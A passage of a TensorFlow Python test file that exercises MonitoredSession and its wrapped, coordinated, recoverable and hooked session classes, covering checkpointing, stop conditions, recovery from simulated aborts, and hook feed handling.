MockStrategy(should_checkpoint=True), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_enabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
is_chief=True, checkpoint_dir=logdir) as session:
self.assertEqual(100, session.run(gstep))
def test_checkpoint_hook_disabled(self):
context = distribute_coordinator._WorkerContext(
MockStrategy(should_checkpoint=False), None, None, None)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
def test_checkpoint_hook_enable_on_non_chief_with_collective_ops(self):
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy()
strategy.extended._is_chief = False
context = distribute_coordinator._WorkerContext(strategy, None, 'worker', 1)
logdir = _test_dir(self.get_temp_dir(), 'test_save_checkpoint_disabled')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
new_gstep = state_ops.assign_add(gstep, 1)
with context, monitored_session.MonitoredTrainingSession(
checkpoint_dir=logdir,
save_checkpoint_steps=100,
log_step_count_steps=10) as session:
for _ in range(100):
session.run(new_gstep)
# No checkpoint is saved.
checkpoint = checkpoint_management.latest_checkpoint(logdir)
self.assertIsNone(checkpoint)
# But saved to a temporary directory.
checkpoint = checkpoint_management.latest_checkpoint(
os.path.join(logdir, 'tmp_worker_1'))
self.assertIsNotNone(checkpoint)
class StopAtNSession(monitored_session._WrappedSession):
"""A wrapped session that stops at the N-th call to _check_stop."""
def __init__(self, sess, n):
super(StopAtNSession, self).__init__(sess)
self._count = n
def _check_stop(self):
if self._count == 0:
return True
self._count -= 1
return False
class WrappedSessionTest(test.TestCase):
"""_WrappedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(sess.graph, wrapped_sess.graph)
self.assertEqual(sess.sess_str, wrapped_sess.sess_str)
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertFalse(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_uses_check_stop(self):
with self.cached_session() as sess:
wrapped_sess = StopAtNSession(sess, 3)
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertFalse(wrapped_sess.should_stop())
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_delegates_to_wrapped_session(self):
with self.cached_session() as sess:
wrapped_sess0 = StopAtNSession(sess, 4)
wrapped_sess1 = monitored_session._WrappedSession(wrapped_sess0)
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertFalse(wrapped_sess1.should_stop())
self.assertTrue(wrapped_sess1.should_stop())
@test_util.run_deprecated_v1
def test_close_twice(self):
with self.cached_session() as sess:
wrapped_sess = monitored_session._WrappedSession(sess)
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
wrapped_sess.close()
self.assertTrue(wrapped_sess.should_stop())
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
self.assertEqual(42, sess.run(v, feed_dict={c: 42}))
wrapped_sess = monitored_session._WrappedSession(sess)
self.assertEqual(51, wrapped_sess.run(v, feed_dict={c: 51}))
def busy_wait_for_coord_stop(coord):
while not coord.should_stop():
time.sleep(0.001)
class CoordinatedSessionTest(test.TestCase):
"""_CoordinatedSession tests."""
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(sess.graph, coord_sess.graph)
self.assertEqual(sess.sess_str, coord_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertEqual(42, coord_sess.run(v, feed_dict={c: 42}))
@test_util.run_deprecated_v1
def test_should_stop_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord_sess.close()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_should_stop_on_coord_stop(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
coord.request_stop()
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_dont_request_stop_on_exception_in_main_thread(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
self.assertEqual(0, coord_sess.run(c))
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
with self.assertRaisesRegex(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
self.assertFalse(coord.should_stop())
self.assertFalse(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_stop_threads_on_close_after_exception(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
self.assertFalse(coord_sess.should_stop())
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(0, coord_sess.run(c))
for t in threads:
self.assertTrue(t.is_alive())
self.assertEqual(1, coord_sess.run(v, feed_dict={c: 1}))
for t in threads:
self.assertTrue(t.is_alive())
with self.assertRaisesRegex(TypeError, 'None has invalid type'):
coord_sess.run([None], feed_dict={c: 2})
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
def test_stop_threads_on_close(self):
with self.cached_session() as sess:
coord = coordinator.Coordinator()
threads = [
threading.Thread(
target=busy_wait_for_coord_stop, args=(coord,)) for _ in range(3)
]
for t in threads:
coord.register_thread(t)
t.start()
coord_sess = monitored_session._CoordinatedSession(sess, coord)
coord_sess.close()
for t in threads:
self.assertFalse(t.is_alive())
self.assertTrue(coord.should_stop())
self.assertTrue(coord_sess.should_stop())
@test_util.run_deprecated_v1
def test_propagates_exception_trace(self):
assertion = control_flow_ops.Assert(False, ['This should fail.'])
with self.cached_session() as sess:
coord = coordinator.Coordinator(clean_stop_exception_types=())
coord_sess = monitored_session._CoordinatedSession(sess, coord)
try:
coord_sess.run([assertion])
self.fail('No exception was raised by assertion.')
except errors_impl.InvalidArgumentError:
# Extract the name of the file where the exception was first raised.
_, _, exc_traceback = sys.exc_info()
tb = traceback.extract_tb(exc_traceback)
exc_source_file = tb[-1][0]
exc_source_basename = os.path.basename(exc_source_file)
# If it's monitored_session.py then the original stack trace was not
# correctly propagated.
self.assertIn(
exc_source_basename, ['session.py', 'monitored_session.py'],
'The exception was raised from an unrecognized file. This unit '
'test probably needs to be updated. Traceback:\n%s\n' % tb)
self.assertEqual(
exc_source_basename, 'session.py',
'Original stack trace was not propagated by MonitoredSession. '
'Traceback:\n%s' % tb)
class AbortAtNSession(object):
"""A mock session that aborts at the N-th run call."""
def __init__(self, sess, n):
self._sess = sess
self._count = n
def close(self):
pass
def run(self, *args, **kwargs):
if self._count == 0:
raise errors_impl.AbortedError('Aborted at N', None, None)
self._count -= 1
return self._sess.run(*args, **kwargs)
class StopCoordinatorWithException(session_run_hook.SessionRunHook):
"""With this hook Coordinator throws an exception after N-runs."""
def __init__(self, calls_before_stopping, exception_to_raise=None):
self._started_the_side_thread_already = False
self._lock = threading.Lock()
self._stored_exception_event = threading.Event()
self._calls_before_stopping = calls_before_stopping
self._exception_to_raise = (exception_to_raise or errors_impl.AbortedError(
None, None, 'Aborted at N'))
def _maybe_stop_with_exception(self, coord):
while True:
with self._lock:
if self._calls_before_stopping == 0:
try:
raise self._exception_to_raise
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
self._stored_exception_event.set()
break
def after_create_session(self, session, coord):
if self._started_the_side_thread_already:
return
separate_thread = threading.Thread(
target=self._maybe_stop_with_exception, args=(coord,))
coord.register_thread(separate_thread)
separate_thread.start()
self._started_the_side_thread_already = True
# Coordinator will take care of joining `separate_thread`.
def after_run(self, run_context, run_values):
stopping_now = False
with self._lock:
self._calls_before_stopping -= 1
if self._calls_before_stopping == 0:
stopping_now = True
if stopping_now:
self._stored_exception_event.wait()
class FailTrainingAfterCoordinatorStopped(StopCoordinatorWithException):
"""With this hook training encounters an exception after N-runs."""
def __init__(self, calls_before_stopping):
StopCoordinatorWithException.__init__(self, calls_before_stopping)
self._coord = None
def after_create_session(self, session, coord):
self._coord = coord
return StopCoordinatorWithException.after_create_session(
self, session, coord)
def after_run(self, run_context, run_values):
StopCoordinatorWithException.after_run(self, run_context, run_values)
try:
# After a `run`, an exception could have been stored inside the
# coordinator.
self._coord.raise_requested_exception()
except errors_impl.AbortedError:
# In real world, the main thread may or may not know about the exception
# that stopped the coordinator. Because the coordinator has stopped, the
# main thread could have gotten stuck as well (for example, the
# coordinator was supposed to execute `FIFOQueue.enqueue` while the main
# thread is executing a blocking `FIFOQueue.dequeue`). After it got stuck,
# the session is going to get garbage collected after some time with:
raise errors_impl.CancelledError(None, None,
'Session got garbage-collected.')
class CountingSessionCreator(object):
"""A creator that counts the number of created sessions."""
def __init__(self, session):
self._initial_session = session
# We only have one session per test case. We can't re-create it, thus
# it shouldn't be closed.
self._initial_session.close = lambda *args: None
self._create_session_calls = 0
@property
def number_of_sessions_created(self):
return self._create_session_calls
def create_session(self):
self._create_session_calls += 1
return self._initial_session
class RecoverableSessionTest(test.TestCase):
"""_RecoverableSession tests."""
class _SessionReturner(object):
def __init__(self, sess):
self._sess = sess
def create_session(self):
return self._sess
@test_util.run_deprecated_v1
def test_properties(self):
with self.cached_session() as sess:
constant_op.constant(0.0)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(sess.graph, recoverable_sess.graph)
self.assertEqual(sess.sess_str, recoverable_sess.sess_str)
@test_util.run_deprecated_v1
def test_run(self):
with self.cached_session() as sess:
c = constant_op.constant(0)
v = array_ops.identity(c)
recoverable_sess = monitored_session._RecoverableSession(
self._SessionReturner(sess))
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
@test_util.run_deprecated_v1
def test_recovery(self):
with self.cached_session() as sess:
class StackSessionCreator(object):
def __init__(self, sess):
self.sessions_to_use = [
AbortAtNSession(sess, x + 1) for x in range(3)
]
def create_session(self):
return self.sessions_to_use.pop(0)
c = constant_op.constant(0)
v = array_ops.identity(c)
session_creator = StackSessionCreator(sess)
# List of 3 sessions to use for recovery. The first one aborts
# after 1 run() call, the second after 2 run calls, the third
# after 3 run calls.
self.assertEqual(3, len(session_creator.sessions_to_use))
# Make the recoverable session uses these 3 sessions in sequence by
# passing a factory that pops from the session_to_use list.
recoverable_sess = monitored_session._RecoverableSession(session_creator)
self.assertEqual(
2, len(session_creator.sessions_to_use)) # One session popped.
# Using first session.
self.assertEqual(51, recoverable_sess.run(v, feed_dict={c: 51}))
self.assertEqual(
2, len(session_creator.sessions_to_use)) # Still 2 sessions available
# This will fail and recover by picking up the second session.
self.assertEqual(42, recoverable_sess.run(v, feed_dict={c: 42}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
self.assertEqual(33, recoverable_sess.run(v, feed_dict={c: 33}))
self.assertEqual(
1, len(session_creator.sessions_to_use)) # Still 1 session available
# This will fail and recover by picking up the last session.
self.assertEqual(24, recoverable_sess.run(v, feed_dict={c: 24}))
self.assertEqual(
0, len(session_creator.sessions_to_use)) # All sessions used.
self.assertEqual(11, recoverable_sess.run(v, feed_dict={c: 11}))
self.assertEqual(0, recoverable_sess.run(v, feed_dict={c: 0}))
# This will fail and throw a real error as the pop() will fail.
with self.assertRaisesRegex(IndexError, 'pop from empty list'):
recoverable_sess.run(v, feed_dict={c: -12})
@test_util.run_deprecated_v1
def test_recovery_from_coordinator_exception(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run(v, feed_dict={c: 51}))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run(v, feed_dict={c: 42}))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[StopCoordinatorWithException(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
hook = StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.'))
session = monitored_session.MonitoredSession(session_creator, [hook])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_when_run_hooks(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = monitored_session.MonitoredSession(
session_creator,
[FailTrainingAfterCoordinatorStopped(calls_before_stopping=2)])
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
def create_raw_session_with_failing_coordinator(self, session_creator, hook):
"""Return MonitoredSession that triggers coordinator failures."""
session = monitored_session.MonitoredSession(session_creator, [hook])
# We would like to test a situation where during fetches through the
# raw session, the coordinator fails with an exception. To do that, we
# are going to use (raw_session + StopCoordinatorWithException) hook
# combination that is stored in
# `MonitoredSession._RecoverableSession._CoordinatedSession._sess`
# at this point:
session._tf_sess = lambda: session._sess._sess._sess
# `run()` on such a session is equivalent to `run()` on the raw session
# with separate coordinator threads independently stopping with an
# exception.
return session
@test_util.run_deprecated_v1
def test_step_fn_recovery_from_coordinator_exception_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.session.run(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator was asked to stop, the underlying session is
# recreated and is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
@test_util.run_deprecated_v1
def test_recovery_from_non_preemption_in_coordinator_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
StopCoordinatorWithException(
calls_before_stopping=2,
exception_to_raise=errors_impl.UnknownError(
None, None, 'Some fatal exception inside the coordinator.')))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# The coordinator will not abort during this call, since it's the call
# number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# The coordinator will abort during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# The coordinator was asked to stop due to non-redeemable error. Training
# should stop and the session should not be recreated.
self.assertTrue(session.should_stop())
self.assertEqual(1, session_creator.number_of_sessions_created)
with self.assertRaises(errors_impl.UnknownError):
session.close()
@test_util.run_deprecated_v1
def test_recovery_from_session_getting_stuck_with_raw_session(self):
with self.cached_session() as test_session:
session_creator = CountingSessionCreator(test_session)
session = self.create_raw_session_with_failing_coordinator(
session_creator,
FailTrainingAfterCoordinatorStopped(calls_before_stopping=2))
self.assertEqual(1, session_creator.number_of_sessions_created)
self.assertFalse(session.should_stop())
c = constant_op.constant(0)
v = array_ops.identity(c)
def feed_step_fn(value):
def step_fn(step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: value})
return step_fn
# Training will not fail, since it's the call number 0.
self.assertEqual(51, session.run_step_fn(feed_step_fn(51)))
self.assertFalse(session.should_stop())
# Training will fail during the next call, since it's the call
# number 1.
self.assertEqual(42, session.run_step_fn(feed_step_fn(42)))
# Even though the coordinator stopped which and training failed, the
# underlying session is recreated and training is to be continued.
self.assertFalse(session.should_stop())
self.assertEqual(2, session_creator.number_of_sessions_created)
class FakeSession(monitored_session._WrappedSession):
def __init__(self, sess):
monitored_session._WrappedSession.__init__(self, sess)
self.args_called = {}
def run(self, fetches, **kwargs):
self.args_called = dict(kwargs)
# Call run only with fetches since we directly pass other arguments.
return monitored_session._WrappedSession.run(self, fetches)
class HookedSessionTest(test.TestCase):
"""Tests of _HookedSession."""
def testRunPassesAllArguments(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_run = FakeSession(sess)
mon_sess = monitored_session._HookedSession(sess=mock_run, hooks=[])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor,
feed_dict='a_feed',
options='an_option',
run_metadata='a_metadata')
self.assertEqual(output, [0])
self.assertEqual(mock_run.args_called, {
'feed_dict': 'a_feed',
'options': 'an_option',
'run_metadata': 'a_metadata'
})
def testCallsHooksBeginEnd(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(a_tensor)
for hook in [mock_hook, mock_hook2]:
self.assertEqual(
hook.last_run_values,
session_run_hook.SessionRunValues(
results=None,
options=config_pb2.RunOptions(),
run_metadata=config_pb2.RunMetadata()))
self.assertEqual(hook.last_run_context.original_args,
session_run_hook.SessionRunArgs(a_tensor))
self.assertEqual(hook.last_run_context.session, sess)
self.assertEqual(hook.call_counter['begin'], 0)
self.assertEqual(hook.call_counter['after_create_session'], 0)
self.assertEqual(hook.call_counter['before_run'], 1)
self.assertEqual(hook.call_counter['after_run'], 1)
def testShouldStop(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
constant_op.constant([0], name='a_tensor')
self.evaluate(variables.global_variables_initializer())
mon_sess.run(fetches='a_tensor')
self.assertFalse(mon_sess.should_stop())
mock_hook.should_stop = True
mon_sess.run(fetches='a_tensor')
self.assertTrue(mon_sess.should_stop())
def testFetchesHookRequests(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
another_tensor = constant_op.constant([5], name='another_tensor')
third_tensor = constant_op.constant([10], name='third_tensor')
mock_hook.request = session_run_hook.SessionRunArgs([another_tensor])
mock_hook2.request = session_run_hook.SessionRunArgs([third_tensor])
self.evaluate(variables.global_variables_initializer())
output = mon_sess.run(fetches=a_tensor)
self.assertEqual(output, [0])
self.assertEqual(mock_hook.last_run_values.results, [5])
self.assertEqual(mock_hook2.last_run_values.results, [10])
def testOnlyHooksHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
self.assertEqual(mon_sess.run(fetches=add_tensor), [15])
def testBothHooksAndUserHaveFeeds(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
c_tensor = constant_op.constant([0], name='c_tensor')
add_tensor = a_tensor + b_tensor + c_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
feed_dict = {c_tensor: [20]}
self.assertEqual(
mon_sess.run(fetches=add_tensor, feed_dict=feed_dict), [35])
# User feed_dict should not be changed
self.assertEqual(len(feed_dict), 1)
def testHooksFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegex(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor)
def testHooksAndUserFeedConflicts(self):
with ops.Graph().as_default(), session_lib.Session() as sess:
mock_hook = FakeHook()
mock_hook2 = FakeHook()
mon_sess = monitored_session._HookedSession(
sess=sess, hooks=[mock_hook, mock_hook2])
a_tensor = constant_op.constant([0], name='a_tensor')
b_tensor = constant_op.constant([0], name='b_tensor')
add_tensor = a_tensor + b_tensor
mock_hook.request = session_run_hook.SessionRunArgs(
None, feed_dict={a_tensor: [5]})
mock_hook2.request = session_run_hook.SessionRunArgs(
None, feed_dict={b_tensor: [10]})
self.evaluate(variables.global_variables_initializer())
with self.assertRaisesRegex(RuntimeError, 'Same tensor is fed'):
mon_sess.run(fetches=add_tensor, feed_dict={b_tensor: [10]})
class RaiseOnceAtCountN(session_run_hook.SessionRunHook):
"""Hook that raises an Exception at step N."""
def __init__(self, n, ex):
self.n = n
self.ex = ex
self.raised = False
def before_run(self, run_context):
# Raise the first time we reach step N.
self.n -= 1
if 0 == self.n and not self.raised:
self.raised = True
raise self.ex
return None
class RunOptionsMetadataHook(session_run_hook.SessionRunHook):
"""A hook that observes & optionally modifies RunOptions and RunMetadata."""
def __init__(self, trace_level, timeout_in_ms, output_partition_graphs,
debug_tensor_watch, report_tensor_allocations_upon_oom):
self._trace_level = trace_level
self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self._report_tensor_allocations_upon_oom = (
report_tensor_allocations_upon_oom)
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs,
report_tensor_allocations_upon_oom=self
._report_tensor_allocations_upon_oom)
options.debug_options.debug_tensor_watch_opts.extend(
[self._debug_tensor_watch])
return session_run_hook.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
